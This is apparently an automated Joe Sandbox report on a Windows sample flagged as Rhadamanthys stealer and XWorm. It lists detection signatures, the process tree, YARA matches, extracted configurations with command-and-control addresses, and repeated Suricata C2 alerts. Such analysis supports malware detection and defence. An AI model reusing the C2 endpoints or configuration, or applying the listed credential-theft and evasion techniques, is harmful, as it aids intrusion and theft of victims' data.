Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1499938
MD5:61d31fb13c1dd46fcb03caf7f648508c
SHA1:ecd46d1e09bdfa50c1587690e70262bc14ba751c
SHA256:6cd031908922840ee684d3c05294e7e071b500915b760c474f22c1def0df14bc
Tags:exe
Infos:

Detection

RHADAMANTHYS, XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected RHADAMANTHYS Stealer
Yara detected UAC Bypass using CMSTP
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Connects to many ports of the same IP (likely port scanning)
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Silenttrinity Stager Msbuild Activity
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: Dllhost Internet Connection
Sigma detected: Use Short Name Path in Command Line
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 7196 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 61D31FB13C1DD46FCB03CAF7F648508C)
    • SendBugReportNew.exe (PID: 7368 cmdline: "C:\Users\user~1\AppData\Local\Temp\SendBugReportNew.exe" MD5: 58717509C1521EACFCC7CDA39E6BD45C)
      • V3.exe (PID: 7404 cmdline: C:\Users\user\AppData\Roaming\Javaoraclev4\YIUEROPTJR\V3.exe MD5: AE36397A23D16920DDFE4DFEC24F6B85)
        • OpenWith.exe (PID: 7560 cmdline: "C:\Windows\system32\openwith.exe" MD5: 0ED31792A7FFF811883F80047CBCFC91)
          • OpenWith.exe (PID: 7724 cmdline: "C:\Windows\system32\openwith.exe" MD5: E4A834784FA08C17D47A1E72429C5109)
            • wmplayer.exe (PID: 6000 cmdline: "C:\Program Files\Windows Media Player\wmplayer.exe" MD5: 89DCD2D4C0EC638AADC00D3530E07E1D)
              • dllhost.exe (PID: 7132 cmdline: "C:\Windows\system32\dllhost.exe" MD5: 08EB78E5BE019DF044C26B14703BD1FA)
      • cmd.exe (PID: 7596 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • MSBuild.exe (PID: 1196 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • SendBugReportNew.exe (PID: 8144 cmdline: "C:\Users\user\AppData\Local\Temp\SendBugReportNew.exe" MD5: 58717509C1521EACFCC7CDA39E6BD45C)
    • cmd.exe (PID: 8160 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • SendBugReportNew.exe (PID: 336 cmdline: "C:\Users\user\AppData\Local\Temp\SendBugReportNew.exe" MD5: 58717509C1521EACFCC7CDA39E6BD45C)
    • cmd.exe (PID: 744 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • MSBuild.exe (PID: 2908 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
RhadamanthysAccording to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
  • Sandworm
https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys
NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm
{"C2 url": "https://pastebin.com/raw/jxfGm9Pc", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
{"C2 url": "https://154.216.19.149:2047/888260cc6af8f/07djb4gj.jifud"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\tqcoJoeSecurity_XWormYara detected XWormJoe Security
    C:\Users\user\AppData\Local\Temp\tqcoMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x6c9f:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x6d3c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x6e51:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x6b11:$cnc4: POST / HTTP/1.1
    C:\Users\user\AppData\Local\Temp\cfiJoeSecurity_XWormYara detected XWormJoe Security
      C:\Users\user\AppData\Local\Temp\cfiMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x6c9f:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x6d3c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x6e51:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x6b11:$cnc4: POST / HTTP/1.1
      C:\Users\user\AppData\Roaming\Javaoraclev4\YIUEROPTJR\V3.exeJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
        Click to see the 1 entries
        SourceRuleDescriptionAuthorStrings
        00000020.00000002.1996496863.00000000052DB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          00000020.00000002.1996496863.00000000052DB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
            00000020.00000002.1996059413.00000000031C0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
              00000020.00000002.1996059413.00000000031C0000.00000004.00001000.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
              • 0x6d67:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
              • 0x6e04:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
              • 0x6f19:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
              • 0x6bd9:$cnc4: POST / HTTP/1.1
              00000009.00000002.1404272161.0000000002E7A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                Click to see the 33 entries
                SourceRuleDescriptionAuthorStrings
                23.2.cmd.exe.34407f8.1.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  23.2.cmd.exe.34407f8.1.raw.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
                  • 0x10f78:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                  • 0x10f40:$s2: Elevation:Administrator!new:
                  32.2.cmd.exe.31c00c8.0.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
                    32.2.cmd.exe.31c00c8.0.raw.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                    • 0x6c9f:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                    • 0x6d3c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                    • 0x6e51:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                    • 0x6b11:$cnc4: POST / HTTP/1.1
                    10.2.V3.exe.c30000.0.unpackJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
                      Click to see the 51 entries

                      System Summary

                      barindex
                      Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 104.20.4.235, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 1196, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49725
                      Source: Network ConnectionAuthor: bartblaze: Data: DestinationIp: 154.216.19.149, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\dllhost.exe, Initiated: true, ProcessId: 7132, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49724
                      Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\SendBugReportNew.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\SendBugReportNew.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7196, ParentProcessName: file.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\SendBugReportNew.exe" , ProcessId: 7368, ProcessName: SendBugReportNew.exe
                      Timestamp:2024-08-27T18:25:39.178331+0200
                      SID:2854802
                      Severity:1
                      Source Port:443
                      Destination Port:49742
                      Protocol:TCP
                      Classtype:Domain Observed Used for C2 Detected
                      Timestamp:2024-08-27T18:27:41.196133+0200
                      SID:2852923
                      Severity:1
                      Source Port:49726
                      Destination Port:6677
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:25:34.785984+0200
                      SID:2852870
                      Severity:1
                      Source Port:6677
                      Destination Port:49726
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:24:30.796640+0200
                      SID:2852923
                      Severity:1
                      Source Port:49726
                      Destination Port:6677
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:25:20.764109+0200
                      SID:2852870
                      Severity:1
                      Source Port:6677
                      Destination Port:49726
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:25:20.764109+0200
                      SID:2852874
                      Severity:1
                      Source Port:6677
                      Destination Port:49726
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:26:57.630580+0200
                      SID:2852923
                      Severity:1
                      Source Port:49726
                      Destination Port:6677
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:26:04.577640+0200
                      SID:2852923
                      Severity:1
                      Source Port:49726
                      Destination Port:6677
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:27:26.866896+0200
                      SID:2852870
                      Severity:1
                      Source Port:6677
                      Destination Port:49726
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:25:12.788465+0200
                      SID:2854802
                      Severity:1
                      Source Port:443
                      Destination Port:49738
                      Protocol:TCP
                      Classtype:Domain Observed Used for C2 Detected
                      Timestamp:2024-08-27T18:26:49.796937+0200
                      SID:2852923
                      Severity:1
                      Source Port:49726
                      Destination Port:6677
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:26:57.626918+0200
                      SID:2852870
                      Severity:1
                      Source Port:6677
                      Destination Port:49726
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:26:38.022006+0200
                      SID:2852870
                      Severity:1
                      Source Port:6677
                      Destination Port:49726
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:25:47.874046+0200
                      SID:2854802
                      Severity:1
                      Source Port:443
                      Destination Port:49743
                      Protocol:TCP
                      Classtype:Domain Observed Used for C2 Detected
                      Timestamp:2024-08-27T18:25:06.198814+0200
                      SID:2854802
                      Severity:1
                      Source Port:443
                      Destination Port:49737
                      Protocol:TCP
                      Classtype:Domain Observed Used for C2 Detected
                      Timestamp:2024-08-27T18:26:26.349934+0200
                      SID:2852923
                      Severity:1
                      Source Port:49726
                      Destination Port:6677
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:27:10.633780+0200
                      SID:2852923
                      Severity:1
                      Source Port:49726
                      Destination Port:6677
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:25:26.009886+0200
                      SID:2854802
                      Severity:1
                      Source Port:443
                      Destination Port:49740
                      Protocol:TCP
                      Classtype:Domain Observed Used for C2 Detected
                      Timestamp:2024-08-27T18:26:49.692892+0200
                      SID:2852870
                      Severity:1
                      Source Port:6677
                      Destination Port:49726
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:25:54.396979+0200
                      SID:2852870
                      Severity:1
                      Source Port:6677
                      Destination Port:49726
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:27:10.629778+0200
                      SID:2852870
                      Severity:1
                      Source Port:6677
                      Destination Port:49726
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:26:01.054684+0200
                      SID:2854802
                      Severity:1
                      Source Port:443
                      Destination Port:49745
                      Protocol:TCP
                      Classtype:Domain Observed Used for C2 Detected
                      Timestamp:2024-08-27T18:26:04.674425+0200
                      SID:2852923
                      Severity:1
                      Source Port:49726
                      Destination Port:6677
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:24:50.775975+0200
                      SID:2852870
                      Severity:1
                      Source Port:6677
                      Destination Port:49726
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:24:50.775975+0200
                      SID:2852874
                      Severity:1
                      Source Port:6677
                      Destination Port:49726
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:25:32.243193+0200
                      SID:2852870
                      Severity:1
                      Source Port:6677
                      Destination Port:49726
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:26:09.054842+0200
                      SID:2852923
                      Severity:1
                      Source Port:49726
                      Destination Port:6677
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:25:33.370929+0200
                      SID:2852923
                      Severity:1
                      Source Port:49726
                      Destination Port:6677
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:24:30.794802+0200
                      SID:2852870
                      Severity:1
                      Source Port:6677
                      Destination Port:49726
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:25:47.100381+0200
                      SID:2852870
                      Severity:1
                      Source Port:6677
                      Destination Port:49726
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:24:20.770041+0200
                      SID:2852870
                      Severity:1
                      Source Port:6677
                      Destination Port:49726
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:24:20.770041+0200
                      SID:2852874
                      Severity:1
                      Source Port:6677
                      Destination Port:49726
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:25:32.286779+0200
                      SID:2852923
                      Severity:1
                      Source Port:49726
                      Destination Port:6677
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:27:26.868692+0200
                      SID:2852923
                      Severity:1
                      Source Port:49726
                      Destination Port:6677
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:24:42.460464+0200
                      SID:2852923
                      Severity:1
                      Source Port:49726
                      Destination Port:6677
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:23:55.617151+0200
                      SID:2854802
                      Severity:1
                      Source Port:2047
                      Destination Port:49722
                      Protocol:TCP
                      Classtype:Domain Observed Used for C2 Detected
                      Timestamp:2024-08-27T18:23:55.617151+0200
                      SID:2854824
                      Severity:2
                      Source Port:2047
                      Destination Port:49722
                      Protocol:TCP
                      Classtype:Potentially Bad Traffic
                      Timestamp:2024-08-27T18:26:20.762189+0200
                      SID:2852870
                      Severity:1
                      Source Port:6677
                      Destination Port:49726
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:26:20.762189+0200
                      SID:2852874
                      Severity:1
                      Source Port:6677
                      Destination Port:49726
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:25:17.618090+0200
                      SID:2852870
                      Severity:1
                      Source Port:6677
                      Destination Port:49726
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:27:20.760087+0200
                      SID:2852870
                      Severity:1
                      Source Port:6677
                      Destination Port:49726
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:27:20.760087+0200
                      SID:2852874
                      Severity:1
                      Source Port:6677
                      Destination Port:49726
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:26:27.456651+0200
                      SID:2854802
                      Severity:1
                      Source Port:443
                      Destination Port:49749
                      Protocol:TCP
                      Classtype:Domain Observed Used for C2 Detected
                      Timestamp:2024-08-27T18:26:50.765418+0200
                      SID:2852870
                      Severity:1
                      Source Port:6677
                      Destination Port:49726
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:26:50.765418+0200
                      SID:2852874
                      Severity:1
                      Source Port:6677
                      Destination Port:49726
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:25:56.694912+0200
                      SID:2852923
                      Severity:1
                      Source Port:49726
                      Destination Port:6677
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:25:47.105103+0200
                      SID:2852923
                      Severity:1
                      Source Port:49726
                      Destination Port:6677
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:26:26.168534+0200
                      SID:2852923
                      Severity:1
                      Source Port:49726
                      Destination Port:6677
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:24:13.397343+0200
                      SID:2854802
                      Severity:1
                      Source Port:443
                      Destination Port:49724
                      Protocol:TCP
                      Classtype:Domain Observed Used for C2 Detected
                      Timestamp:2024-08-27T18:26:58.981890+0200
                      SID:2852870
                      Severity:1
                      Source Port:6677
                      Destination Port:49726
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:26:20.847926+0200
                      SID:2854802
                      Severity:1
                      Source Port:443
                      Destination Port:49748
                      Protocol:TCP
                      Classtype:Domain Observed Used for C2 Detected
                      Timestamp:2024-08-27T18:25:32.600766+0200
                      SID:2854802
                      Severity:1
                      Source Port:443
                      Destination Port:49741
                      Protocol:TCP
                      Classtype:Domain Observed Used for C2 Detected
                      Timestamp:2024-08-27T18:26:04.628339+0200
                      SID:2852870
                      Severity:1
                      Source Port:6677
                      Destination Port:49726
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:27:20.210101+0200
                      SID:2854802
                      Severity:1
                      Source Port:443
                      Destination Port:49757
                      Protocol:TCP
                      Classtype:Domain Observed Used for C2 Detected
                      Timestamp:2024-08-27T18:24:59.597331+0200
                      SID:2854802
                      Severity:1
                      Source Port:443
                      Destination Port:49736
                      Protocol:TCP
                      Classtype:Domain Observed Used for C2 Detected
                      Timestamp:2024-08-27T18:25:50.757178+0200
                      SID:2852870
                      Severity:1
                      Source Port:6677
                      Destination Port:49726
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:25:50.757178+0200
                      SID:2852874
                      Severity:1
                      Source Port:6677
                      Destination Port:49726
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:25:05.826678+0200
                      SID:2852923
                      Severity:1
                      Source Port:49726
                      Destination Port:6677
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:26:26.348263+0200
                      SID:2852870
                      Severity:1
                      Source Port:6677
                      Destination Port:49726
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:26:04.528278+0200
                      SID:2852870
                      Severity:1
                      Source Port:6677
                      Destination Port:49726
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:27:29.788300+0200
                      SID:2852923
                      Severity:1
                      Source Port:49726
                      Destination Port:6677
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:26:00.915808+0200
                      SID:2852870
                      Severity:1
                      Source Port:6677
                      Destination Port:49726
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:25:33.268990+0200
                      SID:2852870
                      Severity:1
                      Source Port:6677
                      Destination Port:49726
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:25:19.421341+0200
                      SID:2854802
                      Severity:1
                      Source Port:443
                      Destination Port:49739
                      Protocol:TCP
                      Classtype:Domain Observed Used for C2 Detected
                      Timestamp:2024-08-27T18:25:33.270765+0200
                      SID:2852923
                      Severity:1
                      Source Port:49726
                      Destination Port:6677
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:26:58.985323+0200
                      SID:2852923
                      Severity:1
                      Source Port:49726
                      Destination Port:6677
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:27:07.007597+0200
                      SID:2854802
                      Severity:1
                      Source Port:443
                      Destination Port:49755
                      Protocol:TCP
                      Classtype:Domain Observed Used for C2 Detected
                      Timestamp:2024-08-27T18:24:33.103498+0200
                      SID:2854802
                      Severity:1
                      Source Port:443
                      Destination Port:49732
                      Protocol:TCP
                      Classtype:Domain Observed Used for C2 Detected
                      Timestamp:2024-08-27T18:26:04.629665+0200
                      SID:2852923
                      Severity:1
                      Source Port:49726
                      Destination Port:6677
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:26:38.024231+0200
                      SID:2852923
                      Severity:1
                      Source Port:49726
                      Destination Port:6677
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:25:20.733952+0200
                      SID:2852870
                      Severity:1
                      Source Port:6677
                      Destination Port:49726
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:24:39.764202+0200
                      SID:2854802
                      Severity:1
                      Source Port:443
                      Destination Port:49733
                      Protocol:TCP
                      Classtype:Domain Observed Used for C2 Detected
                      Timestamp:2024-08-27T18:25:54.412909+0200
                      SID:2854802
                      Severity:1
                      Source Port:443
                      Destination Port:49744
                      Protocol:TCP
                      Classtype:Domain Observed Used for C2 Detected
                      Timestamp:2024-08-27T18:27:41.194654+0200
                      SID:2852870
                      Severity:1
                      Source Port:6677
                      Destination Port:49726
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:25:17.677745+0200
                      SID:2852923
                      Severity:1
                      Source Port:49726
                      Destination Port:6677
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:26:40.707005+0200
                      SID:2854802
                      Severity:1
                      Source Port:443
                      Destination Port:49751
                      Protocol:TCP
                      Classtype:Domain Observed Used for C2 Detected
                      Timestamp:2024-08-27T18:27:33.412952+0200
                      SID:2854802
                      Severity:1
                      Source Port:443
                      Destination Port:49759
                      Protocol:TCP
                      Classtype:Domain Observed Used for C2 Detected
                      Timestamp:2024-08-27T18:25:54.399226+0200
                      SID:2852923
                      Severity:1
                      Source Port:49726
                      Destination Port:6677
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:24:54.129729+0200
                      SID:2852870
                      Severity:1
                      Source Port:6677
                      Destination Port:49726
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:26:57.543554+0200
                      SID:2852923
                      Severity:1
                      Source Port:49726
                      Destination Port:6677
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:27:13.613289+0200
                      SID:2854802
                      Severity:1
                      Source Port:443
                      Destination Port:49756
                      Protocol:TCP
                      Classtype:Domain Observed Used for C2 Detected
                      Timestamp:2024-08-27T18:26:26.161543+0200
                      SID:2852870
                      Severity:1
                      Source Port:6677
                      Destination Port:49726
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:26:17.538502+0200
                      SID:2852923
                      Severity:1
                      Source Port:49726
                      Destination Port:6677
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:27:26.810973+0200
                      SID:2854802
                      Severity:1
                      Source Port:443
                      Destination Port:49758
                      Protocol:TCP
                      Classtype:Domain Observed Used for C2 Detected
                      Timestamp:2024-08-27T18:27:22.307659+0200
                      SID:2852870
                      Severity:1
                      Source Port:6677
                      Destination Port:49726
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:26:04.514116+0200
